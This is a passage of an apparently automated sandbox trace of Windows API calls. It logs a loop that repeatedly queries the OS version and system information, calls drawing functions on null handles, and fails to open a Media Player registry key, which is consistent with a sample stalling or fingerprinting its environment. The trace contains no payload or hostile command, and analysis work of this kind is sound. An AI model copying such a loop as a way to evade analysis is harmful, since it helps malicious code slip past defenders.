dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.139] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.140] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.140] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.140] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.140] BeginPath (hdc=0x0) returned 0 [0090.140] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.140] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.140] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.140] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.140] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.140] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.140] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.140] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401d9 [0090.140] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401dc [0090.140] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045824 [0090.140] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045825 [0090.140] CombineRgn (hrgnDst=0x1045824, hrgnSrc1=0x280401d9, hrgnSrc2=0x260401dc, iMode=1) returned 1 [0090.140] CombineRgn (hrgnDst=0x1045825, hrgnSrc1=0x280401d9, hrgnSrc2=0x260401dc, iMode=4) returned 2 [0090.140] CreateSolidBrush (color=0xff) returned 0x2105823 [0090.140] CreateSolidBrush (color=0xff0000) returned 0x1105826 [0090.140] DeleteObject (ho=0x1105826) returned 1 [0090.140] DeleteObject (ho=0x260401dc) returned 1 [0090.140] DeleteObject (ho=0x280401d9) returned 1 [0090.140] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.140] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.140] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.140] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.140] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.140] BeginPath (hdc=0x0) returned 0 [0090.140] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.141] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.141] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.141] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.141] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.141] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.141] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.141] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401dc [0090.141] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401d9 [0090.141] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045827 [0090.141] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045828 [0090.141] CombineRgn (hrgnDst=0x1045827, hrgnSrc1=0x270401dc, hrgnSrc2=0x290401d9, iMode=1) returned 1 [0090.141] CombineRgn (hrgnDst=0x1045828, hrgnSrc1=0x270401dc, hrgnSrc2=0x290401d9, iMode=4) returned 2 [0090.141] CreateSolidBrush (color=0xff) returned 0x2105826 [0090.141] CreateSolidBrush (color=0xff0000) returned 0x1105829 [0090.141] DeleteObject (ho=0x1105829) returned 1 [0090.141] DeleteObject (ho=0x290401d9) returned 1 [0090.141] DeleteObject (ho=0x270401dc) returned 1 [0090.141] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.141] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.141] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.141] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.141] BeginPath (hdc=0x0) returned 0 [0090.141] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.141] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.141] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.141] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.142] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.142] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.142] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.142] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401d9 [0090.142] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401dc [0090.142] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104582a [0090.142] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104582b [0090.142] CombineRgn (hrgnDst=0x104582a, hrgnSrc1=0x2a0401d9, hrgnSrc2=0x280401dc, iMode=1) returned 1 [0090.142] CombineRgn (hrgnDst=0x104582b, hrgnSrc1=0x2a0401d9, hrgnSrc2=0x280401dc, iMode=4) returned 2 [0090.142] CreateSolidBrush (color=0xff) returned 0x2105829 [0090.142] CreateSolidBrush (color=0xff0000) returned 0x110582c [0090.142] DeleteObject (ho=0x110582c) returned 1 [0090.142] DeleteObject (ho=0x280401dc) returned 1 [0090.142] DeleteObject (ho=0x2a0401d9) returned 1 [0090.142] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.142] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.142] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.142] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.142] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.142] BeginPath (hdc=0x0) returned 0 [0090.142] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.142] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.142] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.142] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.142] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.142] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.143] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.143] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.143] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401dc [0090.143] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401d9 [0090.143] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104582d [0090.143] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104582e [0090.143] CombineRgn (hrgnDst=0x104582d, hrgnSrc1=0x290401dc, hrgnSrc2=0x2b0401d9, iMode=1) returned 1 [0090.143] CombineRgn (hrgnDst=0x104582e, hrgnSrc1=0x290401dc, hrgnSrc2=0x2b0401d9, iMode=4) returned 2 [0090.143] CreateSolidBrush (color=0xff) returned 0x210582c [0090.143] CreateSolidBrush (color=0xff0000) returned 0x110582f [0090.143] DeleteObject (ho=0x110582f) returned 1 [0090.143] DeleteObject (ho=0x2b0401d9) returned 1 [0090.143] DeleteObject (ho=0x290401dc) returned 1 [0090.143] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.143] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.143] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.143] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.143] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.143] BeginPath (hdc=0x0) returned 0 [0090.143] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.143] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.143] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.143] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.143] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.143] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.143] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.144] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.144] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c0401d9 [0090.144] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a0401dc [0090.144] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045830 [0090.144] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045831 [0090.144] CombineRgn (hrgnDst=0x1045830, hrgnSrc1=0x2c0401d9, hrgnSrc2=0x2a0401dc, iMode=1) returned 1 [0090.144] CombineRgn (hrgnDst=0x1045831, hrgnSrc1=0x2c0401d9, hrgnSrc2=0x2a0401dc, iMode=4) returned 2 [0090.144] CreateSolidBrush (color=0xff) returned 0x210582f [0090.144] CreateSolidBrush (color=0xff0000) returned 0x1105832 [0090.144] DeleteObject (ho=0x1105832) returned 1 [0090.144] DeleteObject (ho=0x2a0401dc) returned 1 [0090.144] DeleteObject (ho=0x2c0401d9) returned 1 [0090.144] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.144] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.144] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.144] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.144] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.144] BeginPath (hdc=0x0) returned 0 [0090.144] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.144] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.144] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.144] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.144] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.144] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.144] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.144] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.145] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b0401dc [0090.145] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d0401d9 [0090.145] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045833 [0090.145] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045834 [0090.145] CombineRgn (hrgnDst=0x1045833, hrgnSrc1=0x2b0401dc, hrgnSrc2=0x2d0401d9, iMode=1) returned 1 [0090.145] CombineRgn (hrgnDst=0x1045834, hrgnSrc1=0x2b0401dc, hrgnSrc2=0x2d0401d9, iMode=4) returned 2 [0090.145] CreateSolidBrush (color=0xff) returned 0x2105832 [0090.145] CreateSolidBrush (color=0xff0000) returned 0x1105835 [0090.145] DeleteObject (ho=0x1105835) returned 1 [0090.145] DeleteObject (ho=0x2d0401d9) returned 1 [0090.145] DeleteObject (ho=0x2b0401dc) returned 1 [0090.145] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.145] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.145] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.145] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.145] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.145] BeginPath (hdc=0x0) returned 0 [0090.145] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.145] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.145] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.145] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.145] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.145] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.145] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.145] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.146] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e0401d9 [0090.146] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c0401dc [0090.146] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045836 [0090.146] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045837 [0090.146] CombineRgn (hrgnDst=0x1045836, hrgnSrc1=0x2e0401d9, hrgnSrc2=0x2c0401dc, iMode=1) returned 1 [0090.146] CombineRgn (hrgnDst=0x1045837, hrgnSrc1=0x2e0401d9, hrgnSrc2=0x2c0401dc, iMode=4) returned 2 [0090.146] CreateSolidBrush (color=0xff) returned 0x2105835 [0090.146] CreateSolidBrush (color=0xff0000) returned 0x1105838 [0090.146] DeleteObject (ho=0x1105838) returned 1 [0090.146] DeleteObject (ho=0x2c0401dc) returned 1 [0090.146] DeleteObject (ho=0x2e0401d9) returned 1 [0090.146] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.146] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.146] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.146] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.146] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.146] BeginPath (hdc=0x0) returned 0 [0090.146] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.146] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.146] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.146] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.146] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.146] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.146] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.146] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.146] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d0401dc [0090.146] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f0401d9 [0090.146] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045839 [0090.147] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104583a [0090.147] CombineRgn (hrgnDst=0x1045839, hrgnSrc1=0x2d0401dc, hrgnSrc2=0x2f0401d9, iMode=1) returned 1 [0090.147] CombineRgn (hrgnDst=0x104583a, hrgnSrc1=0x2d0401dc, hrgnSrc2=0x2f0401d9, iMode=4) returned 2 [0090.147] CreateSolidBrush (color=0xff) returned 0x2105838 [0090.147] CreateSolidBrush (color=0xff0000) returned 0x110583b [0090.147] DeleteObject (ho=0x110583b) returned 1 [0090.147] DeleteObject (ho=0x2f0401d9) returned 1 [0090.147] DeleteObject (ho=0x2d0401dc) returned 1 [0090.147] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.147] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.147] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.147] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.147] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.147] BeginPath (hdc=0x0) returned 0 [0090.147] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.147] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.147] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.147] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.147] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.147] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.147] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.147] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.147] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x300401d9 [0090.147] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e0401dc [0090.147] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104583c [0090.147] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104583d [0090.148] CombineRgn (hrgnDst=0x104583c, hrgnSrc1=0x300401d9, hrgnSrc2=0x2e0401dc, iMode=1) returned 1 [0090.148] CombineRgn (hrgnDst=0x104583d, hrgnSrc1=0x300401d9, hrgnSrc2=0x2e0401dc, iMode=4) returned 2 [0090.148] CreateSolidBrush (color=0xff) returned 0x210583b [0090.148] CreateSolidBrush (color=0xff0000) returned 0x110583e [0090.148] DeleteObject (ho=0x110583e) returned 1 [0090.148] DeleteObject (ho=0x2e0401dc) returned 1 [0090.148] DeleteObject (ho=0x300401d9) returned 1 [0090.148] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.148] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.148] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.148] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.148] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.148] BeginPath (hdc=0x0) returned 0 [0090.148] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.148] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.148] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc 